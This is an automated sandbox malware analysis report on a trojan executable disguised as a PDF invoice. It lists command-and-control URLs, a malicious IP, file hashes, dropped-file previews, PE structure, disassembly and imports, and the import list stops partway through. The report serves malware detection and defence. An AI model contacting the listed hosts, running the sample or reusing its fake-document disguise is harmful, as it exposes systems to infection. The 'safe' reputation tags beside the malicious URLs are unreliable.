                                                                                                                  http://www.olconsulting.xyz/ma28/explorer.exe, 00000002.00000003.3453705418.000000000CB55000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000002.4140801025.000000000CB09000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000003.3105523604.000000000CB55000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                                                                  • Avira URL Cloud: safe
                                                                                                                  		unknown
                                                                                                                  https://aka.ms/Vh5j3kexplorer.exe, 00000002.00000002.4132184132.00000000079FB000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000000.1688723563.00000000079FB000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                                                                    		high
                                                                                                                    http://www.liopew.xyz/ma28/explorer.exe, 00000002.00000003.3453705418.000000000CB55000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000002.4140801025.000000000CB09000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000003.3105523604.000000000CB55000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                                                                    • Avira URL Cloud: safe
                                                                                                                    		unknown

                                                                                                                    World Map of Contacted IPs

                                                                                                                    • No. of IPs < 25%
                                                                                                                    • 25% < No. of IPs < 50%
                                                                                                                    • 50% < No. of IPs < 75%
                                                                                                                    • 75% < No. of IPs

                                                                                                                    Public IPs

                                                                                                                    IPDomainCountryFlagASNASN NameMalicious
                                                                                                                    156.67.73.254
                                                                                                                    		loverhoodie.shopUnited States
                                                                                                                    		201341TESONETLTtrue

                                                                                                                    General Information

                                                                                                                    Joe Sandbox version:41.0.0 Charoite
                                                                                                                    Analysis ID:1562986
                                                                                                                    Start date and time:2024-11-26 11:14:06 +01:00
                                                                                                                    Joe Sandbox product:CloudBasic
                                                                                                                    Overall analysis duration:0h 10m 28s
                                                                                                                    Hypervisor based Inspection enabled:false
                                                                                                                    Report type:full
                                                                                                                    Cookbook file name:default.jbs
                                                                                                                    Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
                                                                                                                    Number of analysed new started processes analysed:9
                                                                                                                    Number of new started drivers analysed:0
                                                                                                                    Number of existing processes analysed:0
                                                                                                                    Number of existing drivers analysed:0
                                                                                                                    Number of injected processes analysed:1
                                                                                                                    Technologies:
                                                                                                                    • HCA enabled
                                                                                                                    • EGA enabled
                                                                                                                    • AMSI enabled
                                                                                                                    Analysis Mode:default
                                                                                                                    Sample name:Genesis RMS Private Limited November 2024 pdf.exe
                                                                                                                    Detection:MAL
                                                                                                                    Classification:mal100.troj.evad.winEXE@8/2@11/1
                                                                                                                    EGA Information:
                                                                                                                    • Successful, ratio: 100%
                                                                                                                    HCA Information:
                                                                                                                    • Successful, ratio: 100%
                                                                                                                    • Number of executed functions: 48
                                                                                                                    • Number of non-executed functions: 274
                                                                                                                    Cookbook Comments:
                                                                                                                    • Found application associated with file extension: .exe
                                                                                                                    • Override analysis time to 240s for rundll32

                                                                                                                    Warnings

                                                                                                                    • Exclude process from analysis (whitelisted): MpCmdRun.exe, WMIADAP.exe, SIHClient.exe, conhost.exe
                                                                                                                    • Excluded domains from analysis (whitelisted): ocsp.digicert.com, slscr.update.microsoft.com, otelrules.azureedge.net, ctldl.windowsupdate.com, fe3cr.delivery.mp.microsoft.com
                                                                                                                    • Not all processes where analyzed, report is missing behavior information
                                                                                                                    • Report creation exceeded maximum time and may have missing disassembly code information.
                                                                                                                    • Report size exceeded maximum capacity and may have missing disassembly code.
                                                                                                                    • Report size getting too big, too many NtEnumerateKey calls found.
                                                                                                                    • Report size getting too big, too many NtOpenKey calls found.
                                                                                                                    • Report size getting too big, too many NtOpenKeyEx calls found.
                                                                                                                    • Report size getting too big, too many NtQueryValueKey calls found.
                                                                                                                    • VT rate limit hit for: Genesis RMS Private Limited November 2024 pdf.exe

                                                                                                                    Simulations

                                                                                                                    Behavior and APIs

                                                                                                                    TimeTypeDescription
                                                                                                                    05:15:00API Interceptor7886292x Sleep call for process: explorer.exe modified
                                                                                                                    05:15:41API Interceptor7240847x Sleep call for process: rundll32.exe modified

                                                                                                                    Joe Sandbox View / Context

                                                                                                                    IPs

                                                                                                                    No context

                                                                                                                    Domains

                                                                                                                    No context

                                                                                                                    ASNs

                                                                                                                    MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                                                    TESONETLThttp://alnassers.netGet hashmaliciousUnknownBrowse
                                                                                                                    • 156.67.75.210
                                                                                                                    la.bot.arm5.elfGet hashmaliciousUnknownBrowse
                                                                                                                    • 185.164.39.193
                                                                                                                    https://files.constantcontact.com/2d77228b901/702368a5-3f96-4cb6-b61d-aab8728be1ff.pdfGet hashmaliciousUnknownBrowse
                                                                                                                    • 156.67.73.1
                                                                                                                    Bien nhan thanh toan Swift Message 38579130 VND8509509220_pdf.exeGet hashmaliciousFormBookBrowse
                                                                                                                    • 185.148.106.70
                                                                                                                    Ticari Siparis Belgesi 26 07 2024 17545000600.exeGet hashmaliciousFormBookBrowse
                                                                                                                    • 185.148.106.70
                                                                                                                    INVOICE - MV CNC BANGKOK - ST24PJ-278.exeGet hashmaliciousFormBookBrowse
                                                                                                                    • 156.67.74.121
                                                                                                                    Documento di bonifico bancario intesa Sanpaola 20240613 EUR23750.exeGet hashmaliciousFormBookBrowse
                                                                                                                    • 185.148.106.71
                                                                                                                    http://www.open-sora.orgGet hashmaliciousExela Stealer, Growtopia, Python StealerBrowse
                                                                                                                    • 156.67.75.29
                                                                                                                    OPs5j7Yjb8.elfGet hashmaliciousGafgyt, MiraiBrowse
                                                                                                                    • 156.67.72.41
                                                                                                                    52cMXV8Al2.elfGet hashmaliciousMiraiBrowse
                                                                                                                    • 156.67.72.45

                                                                                                                    JA3 Fingerprints

                                                                                                                    No context

                                                                                                                    Dropped Files

                                                                                                                    No context

                                                                                                                    Created / dropped Files

                                                                                                                    C:\Users\user\AppData\Local\Temp\autD964.tmp

                                                                                                                    Download File
                                                                                                                    Process:C:\Users\user\Desktop\Genesis RMS Private Limited November 2024 pdf.exe
                                                                                                                    File Type:data
                                                                                                                    Category:dropped
                                                                                                                    Size (bytes):183784
                                                                                                                    Entropy (8bit):7.985787441060365
                                                                                                                    Encrypted:false
                                                                                                                    SSDEEP:3072:vUTrUQYErZE4hKf7OyW8IZLsoZuqCLRTlz2i94LjTypxrPYxxrnKlfK:vQQQreQS9rIZsLRTJreyr21nz
                                                                                                                    MD5:D752A39C241E8BF76C20DC3BBAAA8FBA
                                                                                                                    SHA1:92F38EEB31EFB207FCA39F293FCD6130220DDFE5
                                                                                                                    SHA-256:F24918F2CA896CB62CD81F0A4BF8E137DCCECA4174699EBE882436F967360344
                                                                                                                    SHA-512:6118C5B26A5DF2FC3B4E4534C4F24F92D6491A5197D96ECF4D9BFF4E9A32DA11D780218F80DA2C04572D88081351C5581B45B0B6829726338518191F2C983427
                                                                                                                    Malicious:false
                                                                                                                    Reputation:low
                                                                                                                    Preview:EA06.....Zn..."sD..x...+.....4./....~.R.Y..*4...7.S.....gL... ......{3.O0...B+...e2.]..(......N_T.U.r[.Cq..*.....t..u..F[...*vp...vS...]U........%..h8...U<..)Z.W..S..h.....7.D.2...V..B|q.j.|..&s.z..-...6...T..b.Y...8...1..l....'5@.b.Q..'....3...cSA.Th`.X.R.;).2J.Y.%..A...b......} .....V.P@... ......Z.:aZ.,.l3.m\.k.F..............p.o....\.[....p....'.....9.....6^./7I...^F....l...>7...z..$..C.{.t...#5.u.T_...c..z.~5..........Y?..'..L...jg...N'O.....^.&..vl....G!.Bj...f.N...(.....a`..Ob...}f..V>o...9....g3..(....M..W..9.....i./..92......7e..Mg....1.aht..G..ct..c.p.}.5..J...P.p...aQ.b..y......f...Jw......[.c..,gZ.E.p!3...{...............u[.z....9U.f....&.J...{..[.{..53.~~....M..g .`...]Z......X.~....qd....AI...M....ji..Lf}..8.L....k....J.:.F&1M..i..@.]....1....?.P.D'.K...q.t.S....l.v#..ls{r...ZH....Q1........Y..A../u}.q..Oy..."#..C....[qu..7.m........$.c...;...?k..s6t......P..+...S.~.L.KX...0JO.QI.`.|kU[..C...O.y`..<......&...2....+.H...

                                                                                                                    C:\Users\user\AppData\Local\Temp\nondefinition

                                                                                                                    Download File
                                                                                                                    Process:C:\Users\user\Desktop\Genesis RMS Private Limited November 2024 pdf.exe
                                                                                                                    File Type:data
                                                                                                                    Category:dropped
                                                                                                                    Size (bytes):189440
                                                                                                                    Entropy (8bit):7.864607275669974
                                                                                                                    Encrypted:false
                                                                                                                    SSDEEP:3072:0a6IgZQeKY6LtLZqkpEXAIrih0R0hA31A4Gougjk3ZWb7cjJYCKzOMbAVvc4laK:TdJLZEXAJaR0J4GoyA7cjYAu2aK
                                                                                                                    MD5:7279B22723723592552FC3E38F2F68BC
                                                                                                                    SHA1:8E0769470B786FB5BF5DDFE73783C78EF278F1C3
                                                                                                                    SHA-256:CA23B42A26A496F2EF80560D4C66F176137CB6E61C44D74228DE9E04A685E383
                                                                                                                    SHA-512:72BA52CA7D87CB06FBF6C21CAD9DE4177A9F650764A42F1461FDCE86116517C07D20248B88E174EC314A2342456E1A836AB98F487973520F998E436CFD41457D
                                                                                                                    Malicious:false
                                                                                                                    Reputation:low
                                                                                                                    Preview:.iv..H9DQ...X.....N3....O=...QYCDQAA8M7ZN0JY33L5H9DQYCDQAA8.7ZN>U.=3.<...P..e.)(KmG(!W88^./T&W+%y!!q34Vm^4nt...^#Q-.I\SgDQAA8M7.8...U..._...%..A...<..J....S..D...7..Q._..V.Y33L5H9DQYCDQAA8.rZN|KX3<.^.9DQYCDQA.8O6QO:JY.1L5H9DQYCD.@8M'ZN0.[33LuH9TQYCFQAD8L7ZN0J\32L5H9DQ.ADQCA8M7ZN2J..3L%H9TQYCDAAA(M7ZN0JI33L5H9DQYCDQAA8M7ZN0JY33L5H9DQYCDQAA8M7ZN0JY33L5H9DQYCDQAA8M7ZN0JY33L5H9DQYCDQAA8M7ZN0JY33L5H9DQYCDQAA8M7ZN0JY33L5H9DQYCDQAA8M7ZN0JwGV4AH9DE.ADQQA8M.XN0ZY33L5H9DQYCDQAa8MWZN0JY33L5H9DQYCDQAA8M7ZN0JY33L5H9DQYCDQAA8M7ZN0JY33L5H9DQYCDQAA8M7ZN0JY33L5H9DQYCDQAA8M7ZN0JY33L5H9DQYCDQAA8M7ZN0JY33L5H9DQYCDQAA8M7ZN0JY33L5H9DQYCDQAA8M7ZN0JY33L5H9DQYCDQAA8M7ZN0JY33L5H9DQYCDQAA8M7ZN0JY33L5H9DQYCDQAA8M7ZN0JY33L5H9DQYCDQAA8M7ZN0JY33L5H9DQYCDQAA8M7ZN0JY33L5H9DQYCDQAA8M7ZN0JY33L5H9DQYCDQAA8M7ZN0JY33L5H9DQYCDQAA8M7ZN0JY33L5H9DQYCDQAA8M7ZN0JY33L5H9DQYCDQAA8M7ZN0JY33L5H9DQYCDQAA8M7ZN0JY33L5H9DQYCDQAA8M7ZN0JY33L5H9DQYCDQAA8M7ZN0JY33L5H9DQYCDQAA8M7ZN0JY33L5H9DQYCDQAA8M7ZN0JY33L5H9DQYCDQAA8M7ZN0JY33L5H9DQY

                                                                                                                    Static File Info

                                                                                                                    General

                                                                                                                    File type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                                    Entropy (8bit):7.010988750082187
                                                                                                                    TrID:
                                                                                                                    • Win32 Executable (generic) a (10002005/4) 99.96%
                                                                                                                    • Generic Win/DOS Executable (2004/3) 0.02%
                                                                                                                    • DOS Executable Generic (2002/1) 0.02%
                                                                                                                    • Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
                                                                                                                    File name:Genesis RMS Private Limited November 2024 pdf.exe
                                                                                                                    File size:1'086'464 bytes
                                                                                                                    MD5:a03815195e40a8caf9e0da80eccb9240
                                                                                                                    SHA1:f770dbb9f49ad2f03955a2c5a8c70373652d2ba9
                                                                                                                    SHA256:1477618f7a47c1e6cef99ff4626f541de642a01ec9219290d3a92546abc21c9e
                                                                                                                    SHA512:d62156ed630fee3830832151f42adc6f9ae9fbc48497cf3a54a70759121a583168bf60db85ae50d3964183a72eacd1eea4c187b82c2ba2a67cee675332fa997f
                                                                                                                    SSDEEP:24576:fAHnh+eWsN3skA4RV1Hom2KXMmHaCH6m3kVjM4615:Ch+ZkldoPK8YaC53kZY
                                                                                                                    TLSH:D535AD0273D1C036FFAB92739B6AF64196BC79254133852F13981DB9BD701B2263E663
                                                                                                                    File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........s..R...R...R....C..P.....;.S..._@#.a..._@......_@..g...[j..[...[jo.w...R...r.............#.S..._@'.S...R.k.S.....".S...RichR..

                                                                                                                    File Icon

                                                                                                                    Icon Hash:aaf3e3e3938382a0

                                                                                                                    Static PE Info

                                                                                                                    General

                                                                                                                    Entrypoint:0x42800a
                                                                                                                    Entrypoint Section:.text
                                                                                                                    Digitally signed:false
                                                                                                                    Imagebase:0x400000
                                                                                                                    Subsystem:windows gui
                                                                                                                    Image File Characteristics:EXECUTABLE_IMAGE, LARGE_ADDRESS_AWARE, 32BIT_MACHINE
                                                                                                                    DLL Characteristics:DYNAMIC_BASE, TERMINAL_SERVER_AWARE
                                                                                                                    Time Stamp:0x674585C1 [Tue Nov 26 08:24:33 2024 UTC]
                                                                                                                    TLS Callbacks:
                                                                                                                    CLR (.Net) Version:
                                                                                                                    OS Version Major:5
                                                                                                                    OS Version Minor:1
                                                                                                                    File Version Major:5
                                                                                                                    File Version Minor:1
                                                                                                                    Subsystem Version Major:5
                                                                                                                    Subsystem Version Minor:1
                                                                                                                    Import Hash:afcdf79be1557326c854b6e20cb900a7

                                                                                                                    Entrypoint Preview

                                                                                                                    Instruction
                                                                                                                    call 00007F070D1272BDh
                                                                                                                    jmp 00007F070D11A074h
                                                                                                                    int3
                                                                                                                    int3
                                                                                                                    int3
                                                                                                                    int3
                                                                                                                    int3
                                                                                                                    int3
                                                                                                                    int3
                                                                                                                    int3
                                                                                                                    int3
                                                                                                                    int3
                                                                                                                    int3
                                                                                                                    int3
                                                                                                                    push edi
                                                                                                                    push esi
                                                                                                                    mov esi, dword ptr [esp+10h]
                                                                                                                    mov ecx, dword ptr [esp+14h]
                                                                                                                    mov edi, dword ptr [esp+0Ch]
                                                                                                                    mov eax, ecx
                                                                                                                    mov edx, ecx
                                                                                                                    add eax, esi
                                                                                                                    cmp edi, esi
                                                                                                                    jbe 00007F070D11A1FAh
                                                                                                                    cmp edi, eax
                                                                                                                    jc 00007F070D11A55Eh
                                                                                                                    bt dword ptr [004C41FCh], 01h
                                                                                                                    jnc 00007F070D11A1F9h
                                                                                                                    rep movsb
                                                                                                                    jmp 00007F070D11A50Ch
                                                                                                                    cmp ecx, 00000080h
                                                                                                                    jc 00007F070D11A3C4h
                                                                                                                    mov eax, edi
                                                                                                                    xor eax, esi
                                                                                                                    test eax, 0000000Fh
                                                                                                                    jne 00007F070D11A200h
                                                                                                                    bt dword ptr [004BF324h], 01h
                                                                                                                    jc 00007F070D11A6D0h
                                                                                                                    bt dword ptr [004C41FCh], 00000000h
                                                                                                                    jnc 00007F070D11A39Dh
                                                                                                                    test edi, 00000003h
                                                                                                                    jne 00007F070D11A3AEh
                                                                                                                    test esi, 00000003h
                                                                                                                    jne 00007F070D11A38Dh
                                                                                                                    bt edi, 02h
                                                                                                                    jnc 00007F070D11A1FFh
                                                                                                                    mov eax, dword ptr [esi]
                                                                                                                    sub ecx, 04h
                                                                                                                    lea esi, dword ptr [esi+04h]
                                                                                                                    mov dword ptr [edi], eax
                                                                                                                    lea edi, dword ptr [edi+04h]
                                                                                                                    bt edi, 03h
                                                                                                                    jnc 00007F070D11A203h
                                                                                                                    movq xmm1, qword ptr [esi]
                                                                                                                    sub ecx, 08h
                                                                                                                    lea esi, dword ptr [esi+08h]
                                                                                                                    movq qword ptr [edi], xmm1
                                                                                                                    lea edi, dword ptr [edi+08h]
                                                                                                                    test esi, 00000007h
                                                                                                                    je 00007F070D11A255h
                                                                                                                    bt esi, 03h

                                                                                                                    Rich Headers

                                                                                                                    Programming Language:
                                                                                                                    • [ASM] VS2013 build 21005
                                                                                                                    • [ C ] VS2013 build 21005
                                                                                                                    • [C++] VS2013 build 21005
                                                                                                                    • [ C ] VS2008 SP1 build 30729
                                                                                                                    • [IMP] VS2008 SP1 build 30729
                                                                                                                    • [ASM] VS2013 UPD5 build 40629
                                                                                                                    • [RES] VS2013 build 21005
                                                                                                                    • [LNK] VS2013 UPD5 build 40629

                                                                                                                    Data Directories

                                                                                                                    NameVirtual AddressVirtual Size Is in Section
                                                                                                                    IMAGE_DIRECTORY_ENTRY_EXPORT0x00x0
                                                                                                                    IMAGE_DIRECTORY_ENTRY_IMPORT0xbc0cc0x17c.rdata
                                                                                                                    IMAGE_DIRECTORY_ENTRY_RESOURCE0xc80000x3ec94.rsrc
                                                                                                                    IMAGE_DIRECTORY_ENTRY_EXCEPTION0x00x0
                                                                                                                    IMAGE_DIRECTORY_ENTRY_SECURITY0x00x0
                                                                                                                    IMAGE_DIRECTORY_ENTRY_BASERELOC0x1070000x7134.reloc
                                                                                                                    IMAGE_DIRECTORY_ENTRY_DEBUG0x92bc00x1c.rdata
                                                                                                                    IMAGE_DIRECTORY_ENTRY_COPYRIGHT0x00x0
                                                                                                                    IMAGE_DIRECTORY_ENTRY_GLOBALPTR0x00x0
                                                                                                                    IMAGE_DIRECTORY_ENTRY_TLS0x00x0
                                                                                                                    IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG0xa4b500x40.rdata
                                                                                                                    IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT0x00x0
                                                                                                                    IMAGE_DIRECTORY_ENTRY_IAT0x8f0000x884.rdata
                                                                                                                    IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT0x00x0
                                                                                                                    IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR0x00x0
                                                                                                                    IMAGE_DIRECTORY_ENTRY_RESERVED0x00x0

                                                                                                                    Sections

                                                                                                                    NameVirtual AddressVirtual SizeRaw SizeMD5Xored PEZLIB ComplexityFile TypeEntropyCharacteristics
                                                                                                                    .text0x10000x8dfdd0x8e000310e36668512d53489c005622bb1b4a9False0.5735602580325704data6.675248351711057IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                                                                                                                    .rdata0x8f0000x2fd8e0x2fe00748cf1ab2605ce1fd72d53d912abb68fFalse0.32828818537859006data5.763244005758284IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                                                                                                    .data0xbf0000x8f740x5200aae9601d920f07080bdfadf43dfeff12False0.1017530487804878data1.1963819235530628IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                                                                                                    .rsrc0xc80000x3ec940x3ee00f23483e7cad02130113af67d45da9bfcFalse0.8948962475149106data7.816023510148309IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                                                                                                    .reloc0x1070000x71340x7200f04128ad0f87f42830e4a6cdbc38c719False0.7617530153508771data6.783955557128661IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ

                                                                                                                    Resources

                                                                                                                    NameRVASizeTypeLanguageCountryZLIB Complexity
                                                                                                                    RT_ICON0xc85a80x128Device independent bitmap graphic, 16 x 32 x 4, image size 192EnglishGreat Britain0.7466216216216216
                                                                                                                    RT_ICON0xc86d00x128Device independent bitmap graphic, 16 x 32 x 4, image size 128, 16 important colorsEnglishGreat Britain0.3277027027027027
                                                                                                                    RT_ICON0xc87f80x128Device independent bitmap graphic, 16 x 32 x 4, image size 192EnglishGreat Britain0.3885135135135135
                                                                                                                    RT_ICON0xc89200x2e8Device independent bitmap graphic, 32 x 64 x 4, image size 0EnglishGreat Britain0.3333333333333333
                                                                                                                    RT_ICON0xc8c080x128Device independent bitmap graphic, 16 x 32 x 4, image size 0EnglishGreat Britain0.5
                                                                                                                    RT_ICON0xc8d300xea8Device independent bitmap graphic, 48 x 96 x 8, image size 0EnglishGreat Britain0.2835820895522388
                                                                                                                    RT_ICON0xc9bd80x8a8Device independent bitmap graphic, 32 x 64 x 8, image size 0EnglishGreat Britain0.37906137184115524
                                                                                                                    RT_ICON0xca4800x568Device independent bitmap graphic, 16 x 32 x 8, image size 0EnglishGreat Britain0.23699421965317918
                                                                                                                    RT_ICON0xca9e80x25a8Device independent bitmap graphic, 48 x 96 x 32, image size 0EnglishGreat Britain0.13858921161825727
                                                                                                                    RT_ICON0xccf900x10a8Device independent bitmap graphic, 32 x 64 x 32, image size 0EnglishGreat Britain0.25070356472795496
                                                                                                                    RT_ICON0xce0380x468Device independent bitmap graphic, 16 x 32 x 32, image size 0EnglishGreat Britain0.3173758865248227
                                                                                                                    RT_MENU0xce4a00x50dataEnglishGreat Britain0.9
                                                                                                                    RT_STRING0xce4f00x594dataEnglishGreat Britain0.3333333333333333
                                                                                                                    RT_STRING0xcea840x68adataEnglishGreat Britain0.2747909199522103
                                                                                                                    RT_STRING0xcf1100x490dataEnglishGreat Britain0.3715753424657534
                                                                                                                    RT_STRING0xcf5a00x5fcdataEnglishGreat Britain0.3087467362924282
                                                                                                                    RT_STRING0xcfb9c0x65cdataEnglishGreat Britain0.34336609336609336
                                                                                                                    RT_STRING0xd01f80x466dataEnglishGreat Britain0.3605683836589698
                                                                                                                    RT_STRING0xd06600x158Matlab v4 mat-file (little endian) n, numeric, rows 0, columns 0EnglishGreat Britain0.502906976744186
                                                                                                                    RT_RCDATA0xd07b80x35f59data1.0003438649515648
                                                                                                                    RT_GROUP_ICON0x1067140x76dataEnglishGreat Britain0.6610169491525424
                                                                                                                    RT_GROUP_ICON0x10678c0x14dataEnglishGreat Britain1.25
                                                                                                                    RT_GROUP_ICON0x1067a00x14dataEnglishGreat Britain1.15
                                                                                                                    RT_GROUP_ICON0x1067b40x14dataEnglishGreat Britain1.25
                                                                                                                    RT_VERSION0x1067c80xdcdataEnglishGreat Britain0.6181818181818182
                                                                                                                    RT_MANIFEST0x1068a40x3efASCII text, with CRLF line terminatorsEnglishGreat Britain0.5074478649453823

                                                                                                                    Imports

                                                                                                                    DLLImport
                                                                                                                    WSOCK32.dllWSACleanup, socket, inet_ntoa, setsockopt, ntohs, recvfrom, ioctlsocket, htons, WSAStartup, __WSAFDIsSet, select, accept, listen, bind, closesocket, WSAGetLastError, recv, sendto, send, inet_addr, gethostbyname, gethostname, connect
                                                                                                                    VERSION.dllGetFileVersionInfoW, GetFileVersionInfoSizeW, VerQueryValueW
                                                                                                                    WINMM.dlltimeGetTime, waveOutSetVolume, mciSendStringW
                                                                                                                    COMCTL32.dllImageList_ReplaceIcon, ImageList_Destroy, ImageList_Remove, ImageList_SetDragCursorImage, ImageList_BeginDrag, ImageList_DragEnter, ImageList_DragLeave, ImageList_EndDrag, ImageList_DragMove, InitCommonControlsEx, ImageList_Create
                                                                                                                    MPR.dllWNetUseConnectionW, WNetCancelConnection2W, WNetGetConnectionW, WNetAddConnection2W
                                                                                                                    WININET.dllInternetQueryDataAvailable, InternetCloseHandle, InternetOpenW, InternetSetOptionW, InternetCrackUrlW, HttpQueryInfoW, InternetQueryOptionW, HttpOpenRequestW, HttpSendRequestW, FtpOpenFileW, FtpGetFileSize, InternetOpenUrlW, InternetReadFile, InternetConnectW
                                                                                                                    PSAPI.DLLGetProcessMemoryInfo
                                                                                                                    IPHLPAPI.DLLIcmpCreateFile, IcmpCloseHandle, IcmpSendEcho
                                                                                                                    USERENV.dllDestroyEnvironmentBlock, UnloadUserProfile, CreateEnvironmentBlock, LoadUserProfileW
                                                                                                                    UxTheme.dllIsThemeActive
                                                                                                                    KERNEL32.dllDuplicateHandle, CreateThread, WaitForSingleObject, HeapAlloc, GetProcessHeap, HeapFree, Sleep, GetCurrentThreadId, MultiByteToWideChar, MulDiv, GetVersionExW, IsWow64Process, GetSystemInfo, FreeLibrary, LoadLibraryA, GetProcAddress, SetErrorMode, GetModuleFileNameW, WideCharToMultiByte, lstrcpyW, lstrlenW, GetModuleHandleW, QueryPerformanceCounter, VirtualFreeEx, OpenProcess, VirtualAllocEx, WriteProcessMemory, ReadProcessMemory, CreateFileW, SetFilePointerEx, SetEndOfFile, ReadFile, WriteFile, FlushFileBuffers, TerminateProcess, CreateToolhelp32Snapshot, Process32FirstW, Process32NextW, SetFileTime, GetFileAttributesW, FindFirstFileW, SetCurrentDirectoryW, GetLongPathNameW, GetShortPathNameW, DeleteFileW, FindNextFileW, CopyFileExW, MoveFileW, CreateDirectoryW, RemoveDirectoryW, SetSystemPowerState, QueryPerformanceFrequency, FindResourceW, LoadResource, LockResource, SizeofResource, EnumResourceNamesW, OutputDebugStringW, GetTempPathW, GetTempFileNameW, DeviceIoControl, GetLocalTime, CompareStringW, GetCurrentProcess, EnterCriticalSection, LeaveCriticalSection, GetStdHandle, CreatePipe, InterlockedExchange, TerminateThread, LoadLibraryExW, FindResourceExW, CopyFileW, VirtualFree, FormatMessageW, GetExitCodeProcess, GetPrivateProfileStringW, WritePrivateProfileStringW, GetPrivateProfileSectionW, WritePrivateProfileSectionW, GetPrivateProfileSectionNamesW, FileTimeToLocalFileTime, FileTimeToSystemTime, SystemTimeToFileTime, LocalFileTimeToFileTime, GetDriveTypeW, GetDiskFreeSpaceExW, GetDiskFreeSpaceW, GetVolumeInformationW, SetVolumeLabelW, CreateHardLinkW, SetFileAttributesW, CreateEventW, SetEvent, GetEnvironmentVariableW, SetEnvironmentVariableW, GlobalLock, GlobalUnlock, GlobalAlloc, GetFileSize, GlobalFree, GlobalMemoryStatusEx, Beep, GetSystemDirectoryW, HeapReAlloc, HeapSize, GetComputerNameW, GetWindowsDirectoryW, GetCurrentProcessId, GetProcessIoCounters, CreateProcessW, GetProcessId, SetPriorityClass, LoadLibraryW, VirtualAlloc, IsDebuggerPresent, GetCurrentDirectoryW, lstrcmpiW, DecodePointer, GetLastError, RaiseException, InitializeCriticalSectionAndSpinCount, DeleteCriticalSection, InterlockedDecrement, InterlockedIncrement, GetCurrentThread, CloseHandle, GetFullPathNameW, EncodePointer, ExitProcess, GetModuleHandleExW, ExitThread, GetSystemTimeAsFileTime, ResumeThread, GetCommandLineW, IsProcessorFeaturePresent, IsValidCodePage, GetACP, GetOEMCP, GetCPInfo, SetLastError, UnhandledExceptionFilter, SetUnhandledExceptionFilter, TlsAlloc, TlsGetValue, TlsSetValue, TlsFree, GetStartupInfoW, GetStringTypeW, SetStdHandle, GetFileType, GetConsoleCP, GetConsoleMode, RtlUnwind, ReadConsoleW, GetTimeZoneInformation, GetDateFormatW, GetTimeFormatW, LCMapStringW, GetEnvironmentStringsW, FreeEnvironmentStringsW, WriteConsoleW, FindClose, SetEnvironmentVariableA
                                                                                                                    USER32.dllAdjustWindowRectEx, CopyImage, SetWindowPos, GetCursorInfo, RegisterHotKey, ClientToScreen, GetKeyboardLayoutNameW, IsCharAlphaW, IsCharAlphaNumericW, IsCharLowerW, IsCharUpperW, GetMenuStringW, GetSubMenu, GetCaretPos, IsZoomed, MonitorFromPoint, GetMonitorInfoW, SetWindowLongW, SetLayeredWindowAttributes, FlashWindow, GetClassLongW, TranslateAcceleratorW, IsDialogMessageW, GetSysColor, InflateRect, DrawFocusRect, DrawTextW, FrameRect, DrawFrameControl, FillRect, PtInRect, DestroyAcceleratorTable, CreateAcceleratorTableW, SetCursor, GetWindowDC, GetSystemMetrics, GetActiveWindow, CharNextW, wsprintfW, RedrawWindow, DrawMenuBar, DestroyMenu, SetMenu, GetWindowTextLengthW, CreateMenu, IsDlgButtonChecked, DefDlgProcW, CallWindowProcW, ReleaseCapture, SetCapture, CreateIconFromResourceEx, mouse_event, ExitWindowsEx, SetActiveWindow, FindWindowExW, EnumThreadWindows, SetMenuDefaultItem, InsertMenuItemW, IsMenu, TrackPopupMenuEx, GetCursorPos, DeleteMenu, SetRect, GetMenuItemID, GetMenuItemCount, SetMenuItemInfoW, GetMenuItemInfoW, SetForegroundWindow, IsIconic, FindWindowW, MonitorFromRect, keybd_event, SendInput, GetAsyncKeyState, SetKeyboardState, GetKeyboardState, GetKeyState, VkKeyScanW, LoadStringW, DialogBoxParamW, MessageBeep, EndDialog, SendDlgItemMessageW, GetDlgItem, SetWindowTextW, CopyRect, ReleaseDC, GetDC, EndPaint, BeginPaint, GetClientRect, GetMenu, DestroyWindow, EnumWindows, GetDesktopWindow, IsWindow, IsWindowEnabled, IsWindowVisible, EnableWindow, InvalidateRect, GetWindowLongW, GetWindowThreadProcessId, AttachThreadInput, GetFocus, GetWindowTextW, ScreenToClient, SendMessageTimeoutW, EnumChildWindows, CharUpperBuffW, GetParent, GetDlgCtrlID, SendMessageW, MapVirtualKeyW, PostMessageW, GetWindowRect, SetUserObjectSecurity, CloseDesktop, CloseWindowStation, OpenDesktopW, SetProcessWindowStation, GetProcessWindowStation, OpenWindowStationW, GetUserObjectSecurity, MessageBoxW, DefWindowProcW, SetClipboardData, EmptyClipboard, CountClipboardFormats, CloseClipboard, GetClipboardData, IsClipboardFormatAvailable, OpenClipboard, BlockInput, GetMessageW, LockWindowUpdate, DispatchMessageW, TranslateMessage, PeekMessageW, UnregisterHotKey, CheckMenuRadioItem, CharLowerBuffW, MoveWindow, SetFocus, PostQuitMessage, KillTimer, CreatePopupMenu, RegisterWindowMessageW, SetTimer, ShowWindow, CreateWindowExW, RegisterClassExW, LoadIconW, LoadCursorW, GetSysColorBrush, GetForegroundWindow, MessageBoxA, DestroyIcon, SystemParametersInfoW, 